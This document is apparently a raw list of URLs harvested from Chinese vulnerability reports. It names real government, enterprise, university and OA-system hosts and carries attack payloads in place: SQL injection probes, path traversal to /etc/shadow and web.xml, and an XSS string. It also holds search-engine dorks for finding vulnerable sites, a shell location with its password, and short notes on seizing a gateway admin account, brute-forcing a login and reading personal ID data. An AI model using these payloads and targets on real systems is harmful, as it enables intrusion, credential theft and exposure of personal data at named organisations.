http://58.51.84.81:8088/sdh/cd.jsp http://plugin.yy.gov.cn/wlb_xxsb/manage_wailaiban/Login.asp http://www.dcci.com.cn/dynamic/view/cid/2/id/1276.html https://github.com/huaimu/Code_Tapas http://doss.dianxinos.com http://zf.huanle.qq.com/cgi-bin/hlddz_box/hlddz_silver_to_gold_box?callback=haha http://i.178.com/~comment.signature.get_afriend_state?uid=1 http://v.sn.vnet.cn/search/list.jsp http://www.py.gov.cn/DesktopModules/C_Info/WebService/C_InfoService.asmx http://tempuri.org/GetArticleHitsArray soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance xmlns:xsd="http://www.w3.org/2001/XMLSchema xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/ soap:Body http://tempuri.org/ soap:Body soap:Envelope http://www.21tb.com) http://www.21tb.com/web/?c=main&m=clients&type=client http://nftz.cneln.net/eln3_asp/public/cscec8b/bulletin.jsp?type=info&type_id=3&id=8a8080f03f566812013f97d777bb2409&type_id=3&re=0 http://bsb.cneln.net/eln3_asp/public/cscec8b/bulletin.jsp?type=info&type_id=3&id=8a8080f03f566812013f97d777bb2409&type_id=3&re=0 http://ccbnb.cneln.net/eln3_asp/public/cscec8b/bulletin.jsp?type=info&type_id=3&id=8a8080f03f566812013f97d777bb2409&type_id=3&re=0 http://cqpost.cneln.net/eln3_asp/public/cscec8b/bulletin.jsp?type=info&type_id=3&id=8a8080f03f566812013f97d777bb2409&type_id=3&re=0 http://westaport.cneln.net/eln3_asp/public/cscec8b/bulletin.jsp?type=info&type_id=3&id=8a8080f03f566812013f97d777bb2409&type_id=3&re=0 http://hnyz.cneln.net/eln3_asp/public/cscec8b/bulletin.jsp?type=info&type_id=3&id=8a8080f03f566812013f97d777bb2409&type_id=3&re=0 http://ccpm.cneln.net/eln3_asp/public/cscec8b/bulletin.jsp?type=info&type_id=3&id=8a8080f03f566812013f97d777bb2409&type_id=3&re=0 http://gdtietong.cneln.net/eln3_asp/public/cscec8b/bulletin.jsp?type=info&type_id=3&id=8a8080f03f566812013f97d777bb2409&type_id=3&re=0 http://zxjt.cneln.net/eln3_asp/public/cscec8b/bulletin.jsp?type=info&type_id=3&id=8a8080f03f566812013f97d777bb2409&type_id=3&re=0 
http://zjsino-life.cneln.net/eln3_asp/public/cscec8b/bulletin.jsp?type=info&type_id=3&id=8a8080f03f566812013f97d777bb2409&type_id=3&re=0 http://hbed.cneln.net/eln3_asp/public/cscec8b/bulletin.jsp?type=info&type_id=3&id=8a8080f03f566812013f97d777bb2409&type_id=3&re=0 http://suzhoubank.cneln.net/eln3_asp/public/cscec8b/bulletin.jsp?type=info&type_id=3&id=8a8080f03f566812013f97d777bb2409&type_id=3&re=0 http://hrcdpx.cneln.net/eln3_asp/public/cscec8b/bulletin.jsp?type=info&type_id=3&id=8a8080f03f566812013f97d777bb2409&type_id=3&re=0 http://dcpc.cneln.net/eln3_asp/public/cscec8b/bulletin.jsp?type=info&type_id=3&id=8a8080f03f566812013f97d777bb2409&type_id=3&re=0 http://nftz.cneln.net/eln3_asp/public/cscec8b/bulletin.jsp?type=info&type_id=3&id=8a8080f03f566812013f97d777bb2409&type_id=3&re=0 http://bsb.cneln.net/eln3_asp/public/cscec8b/bulletin.jsp?type=info&type_id=3&id=8a8080f03f566812013f97d777bb2409&type_id=3&re=0 http://ccbnb.cneln.net/eln3_asp/public/cscec8b/bulletin.jsp?type=info&type_id=3&id=8a8080f03f566812013f97d777bb2409&type_id=3&re=0 http://suzhoubank.cneln.net/eln3_asp/public/cscec8b/bulletin.jsp?type=info&type_id=3&id=8a8080f03f566812013f97d777bb2409&type_id=3&re=0 http://gdtietong.cneln.net/eln3_asp/public/cscec8b/bulletin.jsp?type=info&type_id=3&id=8a8080f03f566812013f97d777bb2409&type_id=3&re=0 http://wooyun.org/bugs/wooyun-2014-065153 http://oa.gdjierong.com:8090/flow/flow_get_if_value.aspx?template_id=@@version http://oa.mingshiedu.com:801/flow/flow_get_if_value.aspx?template_id=@@version http://oa.ruvar.com/flow/flow_get_if_value.aspx?template_id=@@version http://116.204.107.145:9000/flow/flow_get_if_value.aspx?template_id=@@version http://www.kinghighway.com:9000/flow/flow_get_if_value.aspx?template_id=@@version http://oa.gdjierong.com:8090/include/get_dict.aspx?bt_id=@@version http://oa.mingshiedu.com:801/include/get_dict.aspx?bt_id=@@version http://oa.ruvar.com/include/get_dict.aspx?bt_id=@@version 
http://116.204.107.145:9000/include/get_dict.aspx?bt_id=@@version http://www.kinghighway.com:9000/include/get_dict.aspx?bt_id=@@version http://oa.gdjierong.com:8090/include/get_user.aspx http://oa.mingshiedu.com:801/include/get_user.aspx http://oa.ruvar.com/include/get_user.aspx http://116.204.107.145:9000/include/get_user.aspx http://www.kinghighway.com:9000/include/get_user.aspx http://gjdx.sd.vnet.cn/mobile/getstrategy.jsp?imsi=null http://211.139.69.27:8080/euap/download?fileName=help.doc&filePath=../../../../../../../../../../../etc/shadow http://110.76.39.112:8080/szairmiddle/webservice.ws soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/ xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance xmlns:xsd="http://www.w3.org/2001/XMLSchema xmlns:IwebServiceFilterProxy="http://filterWebservice.iss.com soap:Body IwebServiceFilterProxy:filterProxyForws IwebServiceFilterProxy:in0 xsd:anyType xsi:type="xsd:string xsd:anyType xsd:anyType xsi:type="xsd:string xsd:anyType xsd:anyType xsi:type="xsd:string xsd:anyType xsd:anyType xsi:type="xsd:string xsd:anyType xsd:anyType xsi:type="xsd:string xsd:anyType xsd:anyType xsi:type="xsd:string"/ xsd:anyType xsi:type="xsd:string"/ xsd:anyType xsi:type="xsd:string"/ xsd:anyType xsi:type="xsd:string"/ xsd:anyType xsi:type="xsd:string xsd:anyType xsd:anyType xsi:type="xsd:string xsd:anyType xsd:anyType xsi:type="xsd:string xsd:anyType xsd:anyType xsi:type="xsd:string xsd:anyType xsd:anyType xsi:type="xsd:string xsd:anyType xsd:anyType xsi:type="xsd:string xsd:anyType IwebServiceFilterProxy:in0 IwebServiceFilterProxy:filterProxyForws soap:Body soap:Envelope https://github.com/xiongbiao/sinaSdk/blob/eb9e6c8eb0e20c76fd64e52f0bfb0057755a2310/SwingHtml/bin/system-config.properties http://www.bjszfj.gov.cn/newshow.php?id=1350 http://www.fsmcms.com.cn/) inurl:fsmcms http://www.cnfia.cn/fsmcms/cms/leadermail/p_leadermailsum.jsp http://xfj.wuhai.gov.cn/fsmcms/cms//leadermail/p_leadermailsum.jsp 
http://lclyw.gov.cn/fsmcms/cms//leadermail/p_leadermailsum.jsp http://www.lylc.gov.cn:9090/fsmcms_lylcq/cms/leadermail/p_leadermailsum.jsp http://www.cnfia.cn/fsmcms/cms/leadermail/p_leadermailsum.jsp http://xfj.wuhai.gov.cn/fsmcms/cms//leadermail/p_leadermailsum.jsp http://lclyw.gov.cn/fsmcms/cms//leadermail/p_leadermailsum.jsp http://www.lylc.gov.cn:9090/fsmcms_lylcq/cms/leadermail/p_leadermailsum.jsp http://www.yinzuo100.com/zhuanti-1255.html http://222.143.36.9/template/govlead_temp1.jsp?sid=5a9c10a542e6953a014476aba7850001 https://github.com/lyu302/-java-soku/blob/eb7be3389885f517c7425b62e7be9677f28e8787/WEB-INF/java/com/youku/soku/manage/timer/Top100ReportMailTimer.java http://ehome.zte.com.cn/index.php?id=569'%20OR%20sqlspider&app=goods http://ehome.zte.com.cn/index.php?id=225'%20OR%20sqlspider&app=goods http://ehome.zte.com.cn/index.php?id=985'%20OR%20sqlspider&app=goods http://ehome.zte.com.cn/index.php?id=1368'%20OR%20sqlspider&app=goods http://ehome.zte.com.cn/index.php?id=266'%20OR%20sqlspider&app=goods http://ehome.zte.com.cn/index.php?id=1437'%20OR%20sqlspider&app=goods http://ehome.zte.com.cn/index.php?id=1414'%20OR%20sqlspider&app=goods http://ehome.zte.com.cn/index.php?id=1292'%20OR%20sqlspider&app=goods http://ehome.zte.com.cn/index.php?id=1062'%20OR%20sqlspider&app=goods http://ehome.zte.com.cn/index.php?id=1319'%20OR%20sqlspider&app=goods http://ehome.zte.com.cn/index.php?id=299'%20OR%20sqlspider&app=goods http://ehome.zte.com.cn/index.php?id=1432'%20OR%20sqlspider&app=goods http://ehome.zte.com.cn/index.php?id=445'%20OR%20sqlspider&app=goods http://ehome.zte.com.cn/index.php?id=1299'%20OR%20sqlspider&app=goods http://ehome.zte.com.cn/index.php?id=608'%20OR%20sqlspider&app=goods http://ehome.zte.com.cn/index.php?id=1504'%20OR%20sqlspider&app=goods http://ehome.zte.com.cn/index.php?id=301'%20OR%20sqlspider&app=goods http://ehome.zte.com.cn/index.php?id=221'%20OR%20sqlspider&app=goods 
http://ehome.zte.com.cn/index.php?id=1376'%20OR%20sqlspider&app=goods http://ehome.zte.com.cn/index.php?id=734'%20OR%20sqlspider&app=goods http://ehome.zte.com.cn/index.php?id=1026'%20OR%20sqlspider&app=goods http://ehome.zte.com.cn/index.php?id=steppage_1353895347'%20OR%20sqlspider http://ehome.zte.com.cn/index.php?id=1413'%20OR%20sqlspider&app=goods http://ehome.zte.com.cn/index.php?id=615'%20OR%20sqlspider&app=goods http://ehome.zte.com.cn/index.php?id=306'%20OR%20sqlspider&app=goods http://ehome.zte.com.cn/index.php?id=1425'%20OR%20sqlspider&app=goods http://ehome.zte.com.cn/index.php?id=1372'%20OR%20sqlspider&app=goods http://ehome.zte.com.cn/index.php?id=1431'%20OR%20sqlspider&app=goods http://ehome.zte.com.cn/index.php?id=1505'%20OR%20sqlspider&app=goods http://ehome.zte.com.cn/index.php?id=1377'%20OR%20sqlspider&app=goods http://ehome.zte.com.cn/index.php?id=1370'%20OR%20sqlspider&app=goods http://ehome.zte.com.cn/index.php?id=steppage_1361857688'%20OR%20sqlspider http://ehome.zte.com.cn/index.php?id=1386'%20OR%20sqlspider&app=goods http://ehome.zte.com.cn/index.php?id=1506'%20OR%20sqlspider&app=goods http://ehome.zte.com.cn/index.php?id=1498'%20OR%20sqlspider&app=goods http://ehome.zte.com.cn/index.php?id=1478'%20OR%20sqlspider&app=goods http://ehome.zte.com.cn/index.php?id=1477'%20OR%20sqlspider&app=goods http://ehome.zte.com.cn/index.php?id=1385'%20OR%20sqlspider&app=goods http://ehome.zte.com.cn/index.php?id=945'%20OR%20sqlspider&app=goods http://ehome.zte.com.cn/index.php?id=1369'%20OR%20sqlspider&app=goods http://ehome.zte.com.cn/index.php?id=1315'%20OR%20sqlspider&app=goods http://ehome.zte.com.cn/index.php?id=1309'%20OR%20sqlspider&app=goods http://ehome.zte.com.cn/index.php?id=1027'%20OR%20sqlspider&app=goods http://ehome.zte.com.cn/index.php?id=1421'%20OR%20sqlspider&app=goods http://ehome.zte.com.cn/index.php?id=1417'%20OR%20sqlspider&app=goods http://ehome.zte.com.cn/index.php?id=1415'%20OR%20sqlspider&app=goods 
http://ehome.zte.com.cn/index.php?id=1412'%20OR%20sqlspider&app=goods http://ehome.zte.com.cn/index.php?id=1411'%20OR%20sqlspider&app=goods http://ehome.zte.com.cn/index.php?id=1410'%20OR%20sqlspider&app=goods http://ehome.zte.com.cn/index.php?id=1401'%20OR%20sqlspider&app=goods http://ehome.zte.com.cn/index.php?id=1400'%20OR%20sqlspider&app=goods http://ehome.zte.com.cn/index.php?id=1399'%20OR%20sqlspider&app=goods http://ehome.zte.com.cn/index.php?id=276'%20OR%20sqlspider&app=goods http://ehome.zte.com.cn/index.php?id=275'%20OR%20sqlspider&app=goods http://ehome.zte.com.cn/index.php?id=271'%20OR%20sqlspider&app=goods http://ehome.zte.com.cn/index.php?id=270'%20OR%20sqlspider&app=goods http://ehome.zte.com.cn/index.php?id=911'%20OR%20sqlspider&app=goods http://ehome.zte.com.cn/index.php?id=268'%20OR%20sqlspider&app=goods http://ehome.zte.com.cn/index.php?id=steppage_1352873054'%20OR%20sqlspider http://ehome.zte.com.cn/index.php?id=1406'%20OR%20sqlspider&app=goods http://ehome.zte.com.cn/index.php?id=steppage_1361512328'%20OR%20sqlspider http://ehome.zte.com.cn/index.php?id=755'%20OR%20sqlspider&app=goods http://ehome.zte.com.cn/index.php?id=1297'%20OR%20sqlspider&app=goods http://ehome.zte.com.cn/index.php?id=209'%20OR%20sqlspider&app=goods http://ehome.zte.com.cn/index.php?id=1307'%20OR%20sqlspider&app=goods http://ehome.zte.com.cn/index.php?id=1184'%20OR%20sqlspider&app=goods http://ehome.zte.com.cn/index.php?id=steppage_1361857688'%20OR%20sqlspider http://ehome.zte.com.cn/index.php?id=1499'%20OR%20sqlspider&app=goods http://ehome.zte.com.cn/index.php?id=1422'%20OR%20sqlspider&app=goods http://ehome.zte.com.cn/index.php?id=1327'%20OR%20sqlspider&app=goods http://ehome.zte.com.cn/index.php?id=1057'%20OR%20sqlspider&app=goods http://ehome.zte.com.cn/admin/ http://ehome.zte.com.cn/index.php?app=goods&id=569 http://ehome.zte.com.cn/index.php?app=goods&id=569 http://ehome.zte.com.cn/index.php?app=store&id=6 http://ehome.zte.com.cn/index.php?app=goods&id=225 
http://ehome.zte.com.cn/index.php?app=goods&id=225 http://ehome.zte.com.cn/index.php?app=goods&id=1368 http://ehome.zte.com.cn/index.php?app=goods&id=1368 http://ehome.zte.com.cn/index.php?app=store&id=8 http://www.baison.com.cn/ http://www.peiluyou.com/bind.html http://www.peiluyou.com:9999/getconnectionsettings?_act_=getConnectionSettings http://www.peiluyou.com:9999/isxunleiluyou?_act_=getRouterSetting http://www.peiluyou.com:9999/getstatus?statusId=38&_act_=getWifiInfo http://192.168.111.1:9999/ http://218.25.76.211 http://218.25.76.211/UserMN/UserAudit.asp?userId=1992 http://vip.stock.finance.sina.com.cn/corp/view/vCB_BulletinGather.php?stock_str=1111&gg_date=2014-06-04&ftype=0 http://zwhomeimg.focus.cn/lslj/forum/forum_board_new.php?page_id=10&uid=0&pass=0&page=-1 http://ce**.unionpay.com/ http://cli.irkei.com/53/awxvss14/3982/36431/2689/36981/31563/MTIzNDU2QHFxLmNvbQ__/ http://www.bjbus.com/home/news_detail.php?uNewsCode=00002387&uNewsType=2&uPageType=10 http://www.fj10000.net http://www.fj10000.net/xiamen/ http://huij545.cn.99114.com/ProductList.shtml?c=104 http://www.zzfdc.gov.cn/wygl/wyglArticle.jsp?id=199666 http://www.yaolan.com/videos/.svn/entries http://www.yaolan.com/zhishi/tangshishaicha/tangshishaicha.rar http://www.yaolan.com/adservice/adservice.rar http://119.60.2.37/login.aspx loader:URLLoader http://learnguopei.open.com.cn/VECenter/Article/OfflineJobListArea.aspx?ProvinceCode=230000&Classify=3&IsExcellent=1 https://github.com/lijiejie/OutLook_WebAPP_Brute 
http://host.qycn.com/api_pay/payment_pay_client.php?o_fee=269&o_id=VS_1402975333662680V&tokenkey=ikvIA%252FxwE93eGodSJ3T3WOLXOtIqV0VIdsYye%252F3DNsBIXEjaPS415OnJsB5%252FJBU31iDbxPpf%252BBX%252B10XC6R%252BGpTKOjgxoLOhtZw33M%252F4HnUPKJ8JIOFCpxwwxh0PXX%252BB%252FzdQ3Rf4CEzbqV%252BvcFJWN3q1M%252BF0mYKRf8eV4OiDkdeFVj5yJhKkOIqbA1%252BhuAaQ%252FJrH4b7rOHePdIpvsWvEHTNkViVbuVp4YyzdRya2tyaKLxFr1VPWL%252BFRKKKWqPk6iUaZDIQQ&o_pay_type=1&o_type=1&goods_info=%E9%80%82%E5%90%88%E7%BD%91%E5%BA%97%E3%80%81%E4%B8%93%E4%B8%9A%E8%B5%84%E8%AE%AF%E7%AD%89%E4%B8%AD%E5%B0%8F%E5%9E%8B%E7%BD%91%E7%AB%99&goods_name=%E9%A6%99%E6%B8%AF%E4%BC%81%E4%B8%9AII%E5%9E%8B%2F1%E5%B9%B4&extra_param=12925%2F1%2Ff&time=1402975333 http://202.197.224.60/login.asp http://71party.csu.edu.cn/party_test/login.asp http://pan.baidu.com/s/1mgI5ZhI http://ee.xjtu.edu.cn/dcc/dayi.old/test/Styles/Templates/Default/template.php http://app.cheshi.com/2010vote/vote.php?id=56 http://nmgqgxh.cn.99114.com/ProductList.shtml?c=110 http://hlbenkfm.cn.99114.com/AlbumList.shtml?c=101 http://hqyy.cn.99114.com/AlbumList.shtml?c=101 http://hlbenkfm.cn.99114.com/ProductList.shtml?c=101 http://haoxiangni.cn.99114.com/ProductList.shtml?c=103 http://chengdeshenli.cn.99114.com/ProductList.shtml?c=101 http://sjkxsm.cn.99114.com/ProductList.shtml?c=101 http://haoxiangni.cn.99114.com/AlbumList.shtml?c=101 http://www.228.com.cn/customer/forgotpassword.html http://bbs.scgl.dota2.com.cn/uc_server/admin.php http://zsk.chanjet.com/ up:test www.cqkcy.com/product.php?cid=32 http://eduadmin.open.com.cn/BasicSystem/basicSys/learnCenterLinkInfo.aspx http://business.99114.com/help/list.shtml?code=101102 http://profile.zhenai.com/activity/activityIndex.jsps?ddid=kt%27;%20%20prompt%281%29;%20var%20a=%27 http://cms.wangqi.com/ajax.aspx http://vip.ufida.com.cn/nccsm/customerreport.aspx?customerid=787【注入点】1&customername=%E5%8C%97%E4%BA%AC%E9%93%AD%E6%B3%B0%E9%9B%86%E5%9B%A2&fromdate=1900-01-01&searchkind=%E5%85%A8%E9%83%A8&todate=2010-4-12 
http://home.focus.cn/common/loupan/investment/index.php http://binzhou.focus.cn/common/loupan/investment/ http://house.focus.cn/common/loupan/investment/index.php http://tj.focus.cn/common/loupan/investment/index.php site:focus.cn inurl:investment http://villa.focus.cn/common/bin/test.php http://peixun.esf.focus.cn/.htaccess shell:www.jtds.gov.cn/docs/index.jsp pwd:jeary http://sz.focus.cn/group/result.php?v_poll_id=74&group_id=1787 http://www.xinnet.com/account/account.do?method=index两处登录框,可无视验证码进行暴力破解; http://wooyun.org/bugs/wooyun-2014-062080 inurl:APPPROCESS http://jwgl.hrbcu.edu.cn/ACTIONQUERYELECTIVERESULTBYTEACHSECRETARY.APPPROCESS?mode=2 http://cityjw.dlut.edu.cn:7001/ACTIONQUERYELECTIVERESULTBYTEACHSECRETARY.APPPROCESS?mode=2 http://202.97.179.124:8000/ACTIONQUERYELECTIVERESULTBYTEACHSECRETARY.APPPROCESS?mode=2 http://210.30.108.20:7001/ACTIONQUERYELECTIVERESULTBYTEACHSECRETARY.APPPROCESS?mode=2 http://jwgl.hrbcu.edu.cn:80/ http://club.homevv.com/admin.php http://app.fashion.ifeng.com/luxury/photo.php?brand_id=132&img_id=9975 http://www.xunzai.com:8080/ http://www.pabaoxian.com/WebLogin.aspx http://sales.pa18.com/ http://zf.huanle.qq.com/cgi-bin/hlddz_box/hlddz_silver_to_gold_box?callback=u url:http://testt2.pp.cc/member/login url:http://testuser.pp.cc/login.html http://202.118.32.16/qneirong.php?st=xwdt&nid=54 http://vod.phpvod.com/ http://ip/cgi-bin/webif/Objset-users.sh?edituser=edituser&id=5,我们将id=5改为id=4,然后访问,就会到telecomadmin这个用户的管理界面,然后查看网页的源代码就会看到telecomadmin的密码了,重新用telecomadmin登录,就可以完全控制网关了。 inurl:ruleshow.asp inurl:visitshow.asp inurl:visitseacrch.asp inurl:rulelist.asp http://210.30.208.159/sos/rulelist.asp?cid=1 http://www.dbs110.gov.cn/wsjb/ http://www.antu.gov.cn/xinfang/ http://www.jyj.changzhi.gov.cn/jzxx/ http://www.yiliang.gov.cn/xf/ http://www.xjgl.gov.cn/xzxx/ http://www.qyx.gov.cn/wsxinfang/ http://www.qjetc.gov.cn/sfwt/ http://www.nbgt.gov.cn/aspx/nbgtxf/ http://www.dbecz.gov.cn/xinfan/ http://www.sidui.gov.cn/xinfang1/ 
http://www.dxmzj.gov.cn/jzxx/ http://www.cdws.gov.cn/web/mail_book/ http://www.czjqjcy.gov.cn/jzxx/ http://www.lxzjc.gov.cn/jubao/ http://www.yjxzzb.gov.cn/ http://wsj.hcq.gov.cn/webxfasp/ http://www.jsjhcz.gov.cn/czyx/ http://www.dyqxfj.gov.cn/xfsys/ http://www.flqzgzw.gov.cn/xf/ http://www.jxqgb.gov.cn/wangshangxinfang/ http://www.ysland.gov.cn/xinfang/ http://www.lbgkfq.gov.cn/xinfan/ http://www.ggpolice.gov.cn/wyhswysb1/ http://www.qyqga.gov.cn/xinfan/ http://www.njxzzx.org/njxfj/wsxf/ http://wzbtv.com/sfrx/ http://www.lyjr110.cn/ts/ http://www.julu110.cn/xinfang/ http://www.dbecz.gov.cn/xinfan/ http://www.nxky.cn/tsxt/ http://www.lsyhjd.com/xinfan/ http://www.jxqxj.com/xinfan/ http://12366.qzww.com:88/xf/ http://www.hyls.cn/xf/3 http://hlqqzemail.host.aixin114.com/ http://www.jxqgb.gov.cn/wangshangxinfang/ http://bqxmzj.com/xf/ http://60.211.253.196:81/jwxx/ http://oa.glszyz.org/v_tousu/ http://www.pxkss.com/ http://www.cijiedu.com/xzxx/ http://210.30.208.159/sos/ http://222.90.76.146/jjsh/ts/ http://www.zsms.cc/xzmail/ http://www.myesms.net/zf/ http://www.gysy1.com/mail/ http://syesx.syjyw.net/email/ http://www.wzgxzx.com/xzxx/ http://weiquan.jlccsme.com/ http://223.100.112.43/userLoginAction.action http://223.100.112.43/userLoginAction.action inurl:TeachView.asp http://74.125.227.77/search?q=inurl:TeachView.asp&newwindow=1&ei=lwWhU5ylCZCeyAS96oGgBw&start=20&sa=N&biw=1024&bih=615 http://lmk.xhqedu.gov.cn/TeachView.asp?id=20%27 http://www.nczxx.org/TeachView.asp?id=31%27 http://xszy.pdsu.edu.cn/zsx/TeachView.asp?id=59%27 http://www.pjlbsyxx.com/TeachView.asp?id=22%27 http://www.aybfjz.com/TeachView.asp?id=12%27 http://www.scshlx.com/TeachView.asp?id=21%27 http://www.zsguyi.net/TeachView.asp?id=15%27 http://www.nbyale.com/teachview.asp?id=36%27 http://www.pjlbsyxx.com/TeachView.asp?id=26%27 http://www.hzdfxx.com.cn/teachview.asp?id=24%27 http://www.gtxy.cn/xsc/sgzx/TeachView.asp?id=22%27 http://xszy.pdsu.edu.cn/zsx/TeachView.asp?id=5 http://sqlmap.org 
http://expert.ccidnet.com/ http://www.gzren.com.cn/home/index.asp?action=seach_result http://www.eldshop.cn/data/dbbackup/dw_account_cash_0.sql http://www.eldshop.cn/data/dbbackup/dw_account_cash_1.sql http://sie.cuc.edu.cn/newszhongchua.php?ID=152 http://job.hrbeu.edu.cn/admin1/info/showinfo.asp?infoid=2756 http://58.22.138.34/axis2-admin/ http://58.22.138.34/axis2-admin/manage.htm http://58.42.243.43:8080/login.action http://cms.wangqi.com/ajax.aspx http://www.7stars.net.cn/successful%20case.html inurl:Permission/Application_Query_List.aspx http://hengdong.gov.cn/Permission/Application_Query_List.aspx http://www.leiyang.gov.cn/Permission/Application_Query_List.aspx http://www.hyyfq.gov.cn/Permission/Application_Query_List.aspx http://zx.cq.gov.cn/Permission/Application_Query_List.aspx http://www.hyx.gov.cn/Permission/Application_Query_List.aspx http://www.hnchangning.gov.cn/Permission/Application_Query_List.aspx http://www.hengshan.gov.cn/Permission/Application_Query_List.aspx http://www.zhengxiang.gov.cn/Permission/Application_Query_List.aspx http://59.51.64.36:5544/Permission/Application_Query_List.aspx http://zmhd.yuhua.gov.cn/Permission/Application_Query_List.aspx http://2007.hengshan.gov.cn/Permission/Application_Query_List.aspx http://hengdong.gov.cn/permission/Application_Query_List.aspx?deptName=%E5%9B%BD%E5%9C%9F%E5%B1%80%E7%AA%97%E5%8F%A3&ApplicateCode=123 http://cop.chanjet.com/home/backpwdstep1.jsp http://uop.chanjet.com/home/verify.do?method=gotoStep3Mobile&username=admin http://paxy.10010zj.com.cn/ http://paxy.10010zj.com.cn/admin/admin_index.aspx http://xxcj.zafu.edu.cn/Vote/Editor/skins/common/index.asp http://snmxf.zafu.edu.cn/jcc/images/welcome_files/index.asp http://www.hwhr.cn/member/index.php?mpage=person_addresume&show=2&rid=4639 http://www.pldsec.com/index.php/About/content/id/116 http://www.pldsec.com/index.php/About/content/id/116 
http://209.116.186.246/#newwindow=1&q=intitle:%E6%A0%A1%E5%9B%AD+%E6%8A%80%E6%9C%AF%E6%94%AF%E6%8C%81%EF%BC%9A%E6%97%A0%E9%94%A1%E6%96%B0%E5%BA%A7%E6%A0%87%E6%95%99%E8%82%B2%E6%8A%80%E6%9C%AF%E6%9C%89%E9%99%90%E5%85%AC%E5%8F%B8 inurl:DPMA/FWeb/SchoolWeb/Web/TeacherSource.aspx?KindID= http://209.116.186.246/#newwindow=1&q=inurl:DPMA%2FFWeb%2FSchoolWeb%2FWeb%2FTeacherSource.aspx%3FKindID%3D http://222.191.250.242/DPMA/FWeb/SchoolWeb/Web/TeacherSource.aspx?KindID=1007_1001_1002&sid=310001 http://115.168.45.119/user/user/loginUDB.action http://115.168.45.119/mngr/# http://v1.aili.com/d/click.php?i=MTU4OA== http://localhost:8080/wb/main?xwl=13O1AVUENBSF&dir=@index.txt http://localhost:8080/wb/main?xwl=13O1AVUENBSF&dir=@../../WEB-INF/web.xml http://localhost:8080/wb/main?xwl=13O1AVUENBSF&dir=@../../META-INF/context.xml http://union.ceair.com/web/ResetPassWord.aspx?loginuser=99999,代理拦截查看响应包里的__VIEWSTATE,即可轻松查看用户的身份证号、邮箱、手机号等 http://member.aili.com/index.php?m=member&c=member&a=infosub http://member.aili.com/index.php?m=member&c=member&a=subadd main_search:31354759=%7C%7C%7C00 http://www.goto.buct.edu.cn/ainfo.asp?id=320 http://tousu.baidu.com/zhidao/search?word=%B4%BF%B0%D7%CD%F5%B5%C0&pn=1 http://tousu.baidu.com/jubao/search?word=xxxxxxxx http://tousu.baidu.com/zhidao/search?word=%B4%BF%B0%D7%CD%F5%B5%C0 http://tousu.baidu.com/zhidao/search?word=%B4%BF%B0%D7%CD%F5%B5%C0&pn=1 http://www.qioa.cn/ http://www.qioa.cn/index.php?m=content&c=index&a=lists&catid=7 http://test.oawin.net:8888/Login.aspx http://www.qioa.cn/index.php?m=content&c=index&a=lists&catid=9 http://test.oawin.net:8888/seal/20146181714559017339.ASP http://www.bjld.gov.cn/csibiz/indinfo/passwordSetAction!verifyIndUser http://www.ie.cnu.edu.cn/2011/cnuieadmin.php/Content/index# http://www.qioa.cn/ http://www.qioa.cn/index.php?m=content&c=index&a=lists&catid=7 http://test.oawin.net:8888/Login.aspx http://oa.gdjierong.com:8090/PersonalAffair/worklog_template_show.aspx?id=@@version 
http://www.kinghighway.com:9000/PersonalAffair/worklog_template_show.aspx?id=@@version http://oa.ruvar.com/PersonalAffair/worklog_template_show.aspx?id=@@version http://oa.mingshiedu.com:801/PersonalAffair/worklog_template_show.aspx?id=@@version http://116.204.107.145:9000/PersonalAffair/worklog_template_show.aspx?id=@@version http://oa.gdjierong.com:8090/ProjectManage/pm_gatt_inc.aspx?project_id=@@version http://www.kinghighway.com:9000/ProjectManage/pm_gatt_inc.aspx?project_id=@@version http://oa.ruvar.com/ProjectManage/pm_gatt_inc.aspx?project_id=@@version http://oa.mingshiedu.com:801/ProjectManage/pm_gatt_inc.aspx?project_id=@@version http://116.204.107.145:9000/ProjectManage/pm_gatt_inc.aspx?project_id=@@version http://oa.gdjierong.com:8090/WorkPlan/plan_template_preview.aspx?template_id=@@version http://www.kinghighway.com:9000/WorkPlan/plan_template_preview.aspx?template_id=@@version http://oa.ruvar.com/WorkPlan/plan_template_preview.aspx?template_id=@@version http://oa.mingshiedu.com:801/WorkPlan/plan_template_preview.aspx?template_id=@@version http://116.204.107.145:9000/WorkPlan/plan_template_preview.aspx?template_id=@@version http://oa.gdjierong.com:8090/WorkPlan/WorkPlanAttachDownLoad.aspx?sys_file_storage_id=1%27%20and%20%28@@version%29%3E0%29-- http://www.kinghighway.com:9000/WorkPlan/WorkPlanAttachDownLoad.aspx?sys_file_storage_id=1%27%20and%20%28@@version%29%3E0%29-- http://oa.ruvar.com/WorkPlan/WorkPlanAttachDownLoad.aspx?sys_file_storage_id=1%27%20and%20%28@@version%29%3E0%29-- http://oa.mingshiedu.com:801/WorkPlan/WorkPlanAttachDownLoad.aspx?sys_file_storage_id=1%27%20and%20%28@@version%29%3E0%29-- http://116.204.107.145:9000/WorkPlan/WorkPlanAttachDownLoad.aspx?sys_file_storage_id=1%27%20and%20%28@@version%29%3E0%29-- http://oa.gdjierong.com:8090/WorkFlow/OfficeFileDownload.aspx?filename=1%27%20and%20%28@@version%29%3E0-- http://www.kinghighway.com:9000/WorkFlow/OfficeFileDownload.aspx?filename=1%27%20and%20%28@@version%29%3E0-- 
http://oa.ruvar.com/WorkFlow/OfficeFileDownload.aspx?filename=1%27%20and%20%28@@version%29%3E0-- http://oa.mingshiedu.com:801/WorkFlow/OfficeFileDownload.aspx?filename=1%27%20and%20%28@@version%29%3E0-- http://116.204.107.145:9000/WorkFlow/OfficeFileDownload.aspx?filename=1%27%20and%20%28@@version%29%3E0-- http://oa.gdjierong.com:8090/WorkFlow/wf_work_print.aspx?idlist=@@version http://www.kinghighway.com:9000/WorkFlow/wf_work_print.aspx?idlist=@@version http://oa.ruvar.com/WorkFlow/wf_work_print.aspx?idlist=@@version http://oa.mingshiedu.com:801/WorkFlow/wf_work_print.aspx?idlist=@@version http://116.204.107.145:9000/WorkFlow/wf_work_print.aspx?idlist=@@version http://oa.gdjierong.com:8090/WorkFlow/wf_work_stat_setting.aspx?template_id=@@version http://www.kinghighway.com:9000/WorkFlow/wf_work_stat_setting.aspx?template_id=@@version http://oa.ruvar.com/WorkFlow/wf_work_stat_setting.aspx?template_id=@@version http://oa.mingshiedu.com:801/WorkFlow/wf_work_stat_setting.aspx?template_id=@@version http://116.204.107.145:9000/WorkFlow/wf_work_stat_setting.aspx?template_id=@@version http://oa.gdjierong.com:8090/WorkFlow/wf_work_form_save.aspx?office_missive_id=@@version 